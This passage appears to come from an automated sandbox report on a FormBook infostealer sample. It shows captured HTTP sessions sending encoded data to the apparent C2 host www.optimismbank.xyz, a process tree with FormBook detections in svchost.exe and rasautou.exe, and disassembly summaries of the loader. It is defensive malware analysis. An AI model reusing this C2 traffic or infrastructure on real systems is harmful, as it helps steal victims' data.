62 35 2b 6e 7a 79 4e 46 55 6d 56 69 34 74 7a 38 31 69 6d 58 39 43 56 45 4b 74 6d 41 33 61 58 62 75 77 64 50 75 5a 42 50 46 4c 30 73 57 38 6d 51 52 69 50 53 4b 57 46 51 64 45 68 69 30 32 52 33 67 44 42 4b 44 58 67 68 45 35 59 58 55 64 57 7a 54 50 56 70 77 62 66 57 41 64 5a 63 63 6e 4b 76 50 79 51 63 69 6e 4a 39 4d 47 6b 36 66 78 6d 71 64 53 66 6b 32 66 73 69 77 57 34 30 71 61 48 51 51 2f 35 56 65 57 57 34 55 4d 55 70 6a 59 57 48 63 4e 62 5a 56 35 35 44 2b 45 79 54 72 4a 65 65 48 51 6a 35 39 48 2b 76 42 2b 37 33 2f 56 49 58 48 4e 67 31 6d 33 77 55 57 50 7a 31 48 63 3d Data Ascii: 40G=ECOol4ZZ4iGTf2v0bcBB1d455V5FHoKAftftYQHiTb5+nzyNFUmVi4tz81imX9CVEKtmA3aXbuwdPuZBPFL0sW8mQRiPSKWFQdEhi02R3gDBKDXghE5YXUdWzTPVpwbfWAdZccnKvPyQcinJ9MGk6fxmqdSfk2fsiwW40qaHQQ/5VeWW4UMUpjYWHcNbZV55D+EyTrJeeHQj59H+vB+73/VIXHNg1m3wUWPz1Hc=
Jan 11, 2025 09:37:29.086313009 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	50019	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:31.173294067 CET	1858	OUT	POST /lnyv/ HTTP/1.1 Host: www.optimismbank.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/lnyv/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 32 76 30 62 63 42 42 31 64 34 35 35 56 35 46 48 6f 4b 41 66 74 66 74 59 51 48 69 54 62 78 2b 6e 44 75 4e 4b 54 53 56 34 34 74 7a 31 56 69 72 58 39 43 79 45 4b 30 4f 41 33 57 68 62 6f 30 64 50 4d 68 42 59 45 4c 30 2f 32 38 6d 56 68 69 4b 57 4b 57 71 51 64 55 6c 69 30 6d 52 33 67 44 42 4b 42 66 67 6c 56 35 59 56 55 64 5a 6b 6a 50 6a 2f 41 61 49 57 41 46 6e 63 64 53 31 76 2f 53 51 63 47 44 4a 6d 61 53 6b 6c 50 78 6b 74 64 53 58 6b 32 53 79 69 30 32 43 30 75 61 68 51 58 7a 35 56 61 33 4a 6c 32 34 76 39 43 74 4e 47 4e 49 38 65 32 6f 4c 45 2b 51 4a 65 4a 56 2b 63 6e 77 66 68 63 72 4b 35 32 4c 57 74 35 39 4f 57 55 46 34 79 77 69 75 45 45 7a 65 75 51 4d 37 65 71 39 59 42 78 73 54 46 4b 4f 36 34 49 79 4d 74 57 39 73 46 42 72 6b 74 7a 4c 58 50 46 75 76 66 34 38 30 62 49 7a 2b 70 66 31 52 63 31 76 52 49 42 42 32 64 6a 72 6a 6d 61 75 6f 72 32 30 31 73 77 2b 45 45 46 4b 42 77 49 75 63 72 4c 4f 34 4b 4e 39 39 50 5a 33 76 42 34 78 5a 70 47 45 43 2f 66 75 53 42 72 [TRUNCATED] Data Ascii: 40G=ECOol4ZZ4iGTf2v0bcBB1d455V5FHoKAftftYQHiTbx+nDuNKTSV44tz1VirX9CyEK0OA3Whbo0dPMhBYEL0/28mVhiKWKWqQdUli0mR3gDBKBfglV5YVUdZkjPj/AaIWAFncdS1v/SQcGDJmaSklPxktdSXk2Syi02C0uahQXz5Va3Jl24v9CtNGNI8e2oLE+QJeJV+cnwfhcrK52LWt59OWUF4ywiuEEzeuQM7eq9YBxsTFKO64IyMtW9sFBrktzLXPFuvf480bIz+pf1Rc1vRIBB2djrjmauor201sw+EEFKBwIucrLO4KN99PZ3vB4xZpGEC/fuSBrCfB6A5kemtMr81Z6ojWyWHwdf30CzTDRizJI3+c7XSkS5h7EIZl27vIEbUt+4cRMs8SAzy8ETWgM2wwu4fKOOGRa0pwkgOy3o0j69CEy+PabuFtrf2mB5kI38loHcjWvQ8rZ5sWpQyFTnqRfqLtTtqtwInbWLaTXRBtjFLZholtRPEjqBX+IzZ+0q0kgXRUHlV/eoUvoCeyW+I8OoVsBGWs0behzbrmzeR1C1bq+9euAsvZghz++L0Ru/8Tgnfvo8idQ1xDTVkn2vaLr2DQH+tqQ1d2caijDamYHTXGCxLDzw2+Nf+zlK12CLUPRhXBhDDAW+RAJM4sbEVJMGtlvZ7fCtyyj39/CF6TEA87byXSnVmXnTZ24IQbMxnKcYRP33zIjOhYZDnrmhW+tiSSK+qyUofZW9fnIBdQK/W3WPWu3y6wZhk1SgQAbnr7nt4/aJBAi3sslyFRVNp3ThL7mgU/H6WnH01G2/g+K+B10rvFd66tA43JrKi7PNqG+2e7NeqdSQme6BSQ00f5uFtgYnkGr6aEEYySKAHsuVpb7WZQnPSzzX4WHqXMnOltN+MeapmhkPhqQkS1b2lLm8QOf4g6Ow/x9tW9WdzeRss1uqSKDsa8K1BfhrfsQqNYQ52qtTMksmQsFlyF+ibixsR6j+dVhTJUyDUteak [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	50020	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:33.714456081 CET	548	OUT	GET /lnyv/?40G=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq3FhSQaZR+yoQaYOzH6/2TfWCxrHn1NtVW9znTjg53+OaSVcYfzv2sfk&I6=x8CX HTTP/1.1 Host: www.optimismbank.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:37:34.176297903 CET	388	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 08:37:34 GMT content-length: 267 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 30 47 3d 4a 41 6d 49 6d 4e 6c 36 6d 42 2b 52 52 6c 62 70 62 76 52 33 2b 65 34 32 33 42 74 78 43 6f 33 2f 4f 38 2b 6b 43 42 6e 41 41 59 42 30 35 67 48 74 43 31 76 6b 38 61 4a 62 79 48 79 65 5a 76 4b 4d 63 4d 70 33 46 42 43 71 56 2f 78 66 52 73 56 58 50 57 44 66 71 33 46 68 53 51 61 5a 52 2b 79 6f 51 61 59 4f 7a 48 36 2f 32 54 66 57 43 78 72 48 6e 31 4e 74 56 57 39 7a 6e 54 6a 67 35 33 2b 4f 61 53 56 63 59 66 7a 76 32 73 66 6b 26 49 36 3d 78 38 43 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?40G=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq3FhSQaZR+yoQaYOzH6/2TfWCxrHn1NtVW9znTjg53+OaSVcYfzv2sfk&I6=x8CX"}</script></head></html>

Target ID:	0
Start time:	03:33:06
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\HN1GiQ5tF7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HN1GiQ5tF7.exe"
Imagebase:	0x630000
File size:	1'230'848 bytes
MD5 hash:	5EC27889D9AA6F6474EF1B2C34417751
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:33:07
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HN1GiQ5tF7.exe"
Imagebase:	0x3f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:33:16
Start date:	11/01/2025
Path:	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe"
Imagebase:	0xc10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	03:33:17
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\rasautou.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rasautou.exe"
Imagebase:	0x5f0000
File size:	15'360 bytes
MD5 hash:	DFDBEDC2ED47CBABC13CCC64E97868F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	04:53:03
Start date:	11/01/2025
Path:	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe"
Imagebase:	0xc10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	04:53:16
Start date:	11/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	154

Executed Functions

Function 0065B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc688d693db249866da5901cba89bb10921fd30e5b7aeebf1d3b8ba9d9daba7
Instruction ID: e5a3871d690060f318271a7d311aa8a781e38bf796fe27163b4ed8285f3aa9fe
Opcode Fuzzy Hash: 4dc688d693db249866da5901cba89bb10921fd30e5b7aeebf1d3b8ba9d9daba7
Instruction Fuzzy Hash: FD326C75B022298FDB248F14DC816E9B7F6FF4A311F1851D9E80AA7A81D7309E85CF52

Function 00633D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00633AA3,?), ref: 00633D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00633AA3,?), ref: 00633D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,006F1148,006F1130,?,?,?,?,00633AA3,?), ref: 00633DC8

Part of subcall function 00636430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00633DEE,006F1148,?,?,?,?,?,00633AA3,?), ref: 00636471

SetCurrentDirectoryW.KERNEL32(?,?,?,00633AA3,?), ref: 00633E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006E28F4,00000010), ref: 006A1CCE
SetCurrentDirectoryW.KERNEL32(?,006F1148,?,?,?,?,?,00633AA3,?), ref: 006A1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006CDAB4,006F1148,?,?,?,?,?,00633AA3,?), ref: 006A1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00633AA3), ref: 006A1D90

Part of subcall function 00633E6E: GetSysColorBrush.USER32(0000000F), ref: 00633E79
Part of subcall function 00633E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00633E88
Part of subcall function 00633E6E: LoadIconW.USER32(00000063), ref: 00633E9E
Part of subcall function 00633E6E: LoadIconW.USER32(000000A4), ref: 00633EB0
Part of subcall function 00633E6E: LoadIconW.USER32(000000A2), ref: 00633EC2
Part of subcall function 00633E6E: RegisterClassExW.USER32(?), ref: 00633F30

Part of subcall function 006336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006336E6
Part of subcall function 006336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00633707
Part of subcall function 006336B8: ShowWindow.USER32(00000000,?,?,?,?,00633AA3,?), ref: 0063371B
Part of subcall function 006336B8: ShowWindow.USER32(00000000,?,?,?,?,00633AA3,?), ref: 00633724

Part of subcall function 00634FFC: _memset.LIBCMT ref: 00635022
Part of subcall function 00634FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006350CB

Strings

This is a third-party compiled AutoIt script., xrefs: 006A1CC8
runas, xrefs: 006A1D84
()n, xrefs: 006A1D49

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()n$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-2427968099
Opcode ID: 62c5806236d8f427a871bf2ef54c8014e0543c7bb36cac953aec310666dcd2a5
Instruction ID: 6361655939eb9e8339e8a74a2cde9bb04b795dcf6b5b8d9d0351bd1bb178ebcb
Opcode Fuzzy Hash: 62c5806236d8f427a871bf2ef54c8014e0543c7bb36cac953aec310666dcd2a5
Instruction Fuzzy Hash: 64511830904259EACB11FBB1DC42EFE7B7B9F07740F005129F2026B2A2DE744A46CBA5

Function 0064DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0064DDEC
GetCurrentProcess.KERNEL32(00000000,006CDC38,?,?), ref: 0064DEAC
GetNativeSystemInfo.KERNELBASE(?,006CDC38,?,?), ref: 0064DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0064DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0064DF1F
GetSystemInfo.KERNEL32(?,006CDC38,?,?), ref: 0064DF29
GetSystemInfo.KERNEL32(?,006CDC38,?,?), ref: 0064DF35

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 19f7f56274946df91bd6812eafdfdb2659164835f410356f971ea14060206208
Instruction ID: def9101e7865c9a13ada128ea4ff79211888b5024989b56e687013667fdb3463
Opcode Fuzzy Hash: 19f7f56274946df91bd6812eafdfdb2659164835f410356f971ea14060206208
Instruction Fuzzy Hash: 1161AFB1C0A384DFCF15DF6898C11E97FB6AF2A300B1989D9D8459F307D624C949CB69

Function 0063406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0063449E,?,?,00000000,00000001), ref: 0063407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0063449E,?,?,00000000,00000001), ref: 00634092
LoadResource.KERNEL32(?,00000000,?,?,0063449E,?,?,00000000,00000001,?,?,?,?,?,?,006341FB), ref: 006A4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0063449E,?,?,00000000,00000001,?,?,?,?,?,?,006341FB), ref: 006A4F2F
LockResource.KERNEL32(0063449E,?,?,0063449E,?,?,00000000,00000001,?,?,?,?,?,?,006341FB,00000000), ref: 006A4F42

Strings

SCRIPT, xrefs: 00634088

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: dddeba987280a80918265ec39614fae14830b097ef050e1ca5d5b52254cb4bce
Instruction ID: 19bd126fe4db268032ce3af4ce5e5c94ea5ad490ad9767ece529059bf4634270
Opcode Fuzzy Hash: dddeba987280a80918265ec39614fae14830b097ef050e1ca5d5b52254cb4bce
Instruction Fuzzy Hash: 401130B1200701BFE7259B65EC48F67BBBAEFC5B55F10416CF6029A250DB71ED408A60

Function 00676CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,006A2F49), ref: 00676CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00676CCA
FindClose.KERNEL32(00000000), ref: 00676CDA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 119008bfa7051d86c4c1e1df0349e89b0b112fb1e3c20b873f82435ff67ab96a
Instruction ID: 76583947d5578d6fccf1d1ea846ba844af75e206f1f45168467048814e51cadb
Opcode Fuzzy Hash: 119008bfa7051d86c4c1e1df0349e89b0b112fb1e3c20b873f82435ff67ab96a
Instruction Fuzzy Hash: 4CE0D87181081157C310673CEC0D4E9376EDA05339F104715F475C12D0F770DD4445D5

Function 00643200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

o, xrefs: 006A933E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharUpper
String ID: o
API String ID: 3964851224-2897792247
Opcode ID: d95966d0b3fe9c4b15cb4863ae0669857c1f0dffdad9ecd2cdd56ff31554af5c
Instruction ID: 01ee849b068839f4eb127e9cf7cc21de3cb4f7b26ecf924ecfa2016fe245581f
Opcode Fuzzy Hash: d95966d0b3fe9c4b15cb4863ae0669857c1f0dffdad9ecd2cdd56ff31554af5c
Instruction Fuzzy Hash: 66926A706083519FD764DF18C480B6ABBE2FF89304F24885DE99A8B362D771ED45CB92

Function 0063E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063E959
timeGetTime.WINMM ref: 0063EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063ED2E
TranslateMessage.USER32(?), ref: 0063ED3F
DispatchMessageW.USER32(?), ref: 0063ED4A
LockWindowUpdate.USER32(00000000), ref: 0063ED79
DestroyWindow.USER32 ref: 0063ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063ED9F
Sleep.KERNEL32(0000000A), ref: 006A5270
TranslateMessage.USER32(?), ref: 006A59F7
DispatchMessageW.USER32(?), ref: 006A5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006A5A19

Strings

@GUI_CTRLID, xrefs: 006A5314
@GUI_WINHANDLE, xrefs: 006A5360
@GUI_CTRLHANDLE, xrefs: 006A53AC
@TRAY_ID, xrefs: 006A54C9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 737ed9362fc4f1e6c479b1b10db1154cb338ec7a94152a916b75910d0a802d7a
Instruction ID: 2995857a1571c829bb49fdb61a57c1d502afc8f974833517200c420adfdaaf45
Opcode Fuzzy Hash: 737ed9362fc4f1e6c479b1b10db1154cb338ec7a94152a916b75910d0a802d7a
Instruction Fuzzy Hash: FA62D070508341DFDB60EF24C885BAAB7E6BF45300F04596DF98A8B2D2DB75D844CBA2

Function 00665C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00665EC3
___createFile.LIBCMT ref: 00665F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00665F2D
__dosmaperr.LIBCMT ref: 00665F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00665F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00665F6A
__dosmaperr.LIBCMT ref: 00665F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00665F7C
__set_osfhnd.LIBCMT ref: 00665FAC
__lseeki64_nolock.LIBCMT ref: 00666016
__close_nolock.LIBCMT ref: 0066603C
__chsize_nolock.LIBCMT ref: 0066606C
__lseeki64_nolock.LIBCMT ref: 0066607E
__lseeki64_nolock.LIBCMT ref: 00666176
__lseeki64_nolock.LIBCMT ref: 0066618B
__close_nolock.LIBCMT ref: 006661EB

Part of subcall function 0065EA9C: CloseHandle.KERNELBASE(00000000,006DEEF4,00000000,?,00666041,006DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0065EAEC
Part of subcall function 0065EA9C: GetLastError.KERNEL32(?,00666041,006DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0065EAF6
Part of subcall function 0065EA9C: __free_osfhnd.LIBCMT ref: 0065EB03
Part of subcall function 0065EA9C: __dosmaperr.LIBCMT ref: 0065EB25

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

